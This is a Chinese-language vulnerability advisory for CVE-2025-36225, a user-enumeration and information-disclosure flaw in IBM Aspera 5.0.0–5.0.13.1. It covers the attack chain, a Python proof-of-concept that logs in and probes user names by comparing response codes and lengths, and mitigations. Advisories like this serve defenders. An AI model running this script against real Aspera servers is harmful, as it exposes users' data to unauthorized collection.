CVE-2025-36225 IBM Aspera 信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-36225

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Aspera

漏洞概述

CVE-2025-36225是IBM Aspera 5.0.0至5.0.13.1版本中存在的信息泄露漏洞。该漏洞源于系统在返回数据时存在可观察的差异性（observable discrepancy），经过身份验证的低权限用户可以通过分析系统返回数据的细微差别来推断和获取系统中其他用户的敏感信息。此类漏洞属于侧信道信息泄露的一种表现形式，攻击者无需复杂的利用手段，仅需通过观察正常API调用或页面请求的响应差异即可获取未授权访问的数据。

根据CVSS 3.1评分标准，该漏洞的评分为4.3分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N），对机密性影响为低（C:L），对完整性和可用性无影响。该漏洞由IBM PSIRT团队发现并报告，已于2025年10月9日公开披露。

IBM Aspera是一款广泛应用于企业级高速文件传输的产品，常用于媒体传输、数据迁移等场景。由于该漏洞允许低权限认证用户获取敏感信息，可能导致用户隐私数据泄露，在多租户环境下尤其危险，可能影响数据隔离性和用户隐私保护。

技术细节

该漏洞的核心原理在于系统API或页面在处理不同用户请求时，返回的响应数据存在可被观察到的差异（observable discrepancy）。具体而言，当一个低权限认证用户访问某些功能接口时，系统返回的响应内容会根据目标资源是否存在、当前用户权限级别或其他条件产生细微但可检测的差异。

攻击者可以通过以下方式利用此漏洞：
1. 以合法用户身份登录IBM Aspera系统；
2. 通过正常API调用或HTTP请求访问目标接口；
3. 仔细比对不同请求返回的响应数据，包括HTTP状态码、响应时间、响应体内容长度、错误信息差异等；
4. 根据这些差异推断系统中是否存在特定用户、文件或其他敏感资源；
5. 通过多次重复请求和差异分析，逐步收集系统中的敏感用户信息。

这种攻击方式类似于用户枚举（User Enumeration）攻击，攻击者无需直接访问目标数据，仅通过系统行为的侧信道信息即可间接获取敏感数据。由于攻击所需权限仅为低权限认证用户，且无需用户交互，该漏洞在实际环境中具有较高的可利用性。

攻击链分析

STEP 1

步骤1：获取合法凭证

攻击者通过注册、钓鱼或其他方式获取一个IBM Aspera系统的低权限认证账户。

STEP 2

步骤2：登录系统

使用合法凭证登录IBM Aspera系统，建立认证会话并获取访问令牌。

STEP 3

步骤3：探测API接口

通过正常API调用访问用户信息查询接口，发送目标用户名作为参数。

STEP 4

步骤4：分析响应差异

对比不同请求返回的响应数据差异，包括响应长度、状态码、错误信息等。

STEP 5

步骤5：推断敏感信息

根据响应差异推断系统中是否存在特定用户、获取用户敏感属性信息。

STEP 6

步骤6：数据收集与利用

批量枚举系统中的用户信息，收集敏感数据用于后续攻击或数据贩卖。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36225 PoC - IBM Aspera Information Disclosure via Observable Discrepancy
# This PoC demonstrates user enumeration through response discrepancy

import requests

TARGET_URL = "https://target-aspera-server:9092"
USERNAME = "authenticated_low_priv_user"
PASSWORD = "user_password"

def authenticate(session, base_url, username, password):
    """Authenticate to IBM Aspera and obtain session token"""
    login_url = f"{base_url}/ajax_endpoint"
    login_data = {
        "operation": "login",
        "username": username,
        "password": password
    }
    response = session.post(login_url, json=login_data, verify=False)
    if response.status_code == 200:
        return response.json().get("token")
    return None

def enumerate_users(session, base_url, token, user_list):
    """Enumerate valid users by observing response discrepancies"""
    results = {}
    headers = {"Authorization": f"Bearer {token}"}

    for target_user in user_list:
        # Query user information endpoint
        query_url = f"{base_url}/ajax_endpoint"
        query_data = {
            "operation": "get_user_info",
            "username": target_user
        }

        response = session.post(query_url, json=query_data, headers=headers, verify=False)

        # Analyze response discrepancies
        response_length = len(response.content)
        status_code = response.status_code

        # Valid users typically return different response patterns
        if status_code == 200 and response_length > 100:
            results[target_user] = "likely_exists"
        elif status_code == 403:
            results[target_user] = "exists_but_restricted"
        else:
            results[target_user] = "not_found"

    return results

if __name__ == "__main__":
    session = requests.Session()
    token = authenticate(session, TARGET_URL, USERNAME, PASSWORD)

    if token:
        candidates = ["admin", "root", "user1", "test", "service_account"]
        results = enumerate_users(session, TARGET_URL, token, candidates)
        print("Enumeration results:", results)
    else:
        print("Authentication failed")

影响范围

IBM Aspera >= 5.0.0

IBM Aspera <= 5.0.13.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制低权限用户对用户信息相关API接口的访问权限；2）配置Web应用防火墙（WAF）规则，检测和阻止异常的批量用户查询行为；3）实施统一的错误响应策略，确保系统对不同类型的请求返回一致的响应内容，消除可观察的差异性；4）加强访问日志监控，及时发现可疑的用户枚举活动；5）对敏感用户信息字段进行额外的访问控制，确保低权限用户无法通过任何途径获取其他用户的敏感数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36225
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36225
3 Details https://www.cvedetails.com/cve/CVE-2025-36225/
4 VulDB https://vuldb.com/cve/CVE-2025-36225
5 Link https://www.ibm.com/support/pages/node/7247502